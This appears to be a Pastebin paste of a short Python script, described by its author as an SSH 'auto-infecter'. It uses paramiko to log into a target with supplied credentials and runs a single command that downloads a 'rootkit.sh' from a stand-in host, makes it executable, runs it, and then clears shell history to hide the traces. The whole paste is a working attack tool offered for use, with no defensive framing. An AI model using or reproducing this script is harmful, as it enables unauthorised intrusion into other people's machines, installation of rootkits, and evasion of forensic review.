Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # This is auto-infecter for SSH port tcp/22
- # You can auto-connect to the target and send
- # sudo commands, this was/is mainly used for rooting
- # a sudo user on your via target but you can use this
- # for whatever you'd like, I have a few good usages for it.
- #
- # Execution:
- # python Infect_One_Host.py <target> <username> <password>
- #
- # Author:
- # Chris Poole | @codingplanets
- import paramiko
- import sys
- if len(sys.argv) < 3:
- sys.exit("\033[37mUsage: python "+sys.argv[0]+" <target> <user> <password>")
- command = 'cd /tmp; wget http://malicious.code/rootkit.sh -O root.sh; chmod 777 root.sh; sh root.sh; history -c'
- hostname = sys.argv[1]
- username = sys.argv[2]
- password = sys.argv[3]
- port = 22
- client = paramiko.Transport((hostname, port))
- client.connect(username=username, password=password)
- nbytes = 4096
- stdout_data = []
- stderr_data = []
- session = client.open_channel(kind='session')
- session.exec_command(command)
- while True:
- if session.recv_ready():
- stdout_data.append(session.recv(nbytes))
- if session.recv_stderr_ready():
- stderr_data.append(session.recv_stderr(nbytes))
- if session.exit_status_ready():
- break
- #print 'exit status: ', session.recv_exit_status()
- print ''.join(stdout_data)
- print ''.join(stderr_data)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement